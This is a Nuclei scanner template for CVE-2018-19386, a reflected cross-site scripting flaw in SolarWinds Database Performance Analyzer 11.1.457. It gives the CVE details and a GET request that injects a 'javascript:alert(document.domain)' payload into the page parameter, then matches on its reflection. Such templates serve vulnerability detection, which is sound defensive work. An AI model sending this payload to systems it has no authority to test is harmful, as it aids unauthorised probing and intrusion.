nuclei-templates/cves/2018/CVE-2018-19386.yaml

30 lines
980 B
YAML

id: CVE-2018-19386
info:
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
author: pikpikcu
severity: medium
description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button
on the page, aka a /iwc/idcStateError.iwc?page= URI.
reference:
- https://www.cvedetails.com/cve/CVE-2018-19386/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-19386
cwe-id: CWE-79
tags: cve,cve2018,solarwinds,xss
requests:
- method: GET
path:
- "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<a href="javascript:alert(document.domain)//'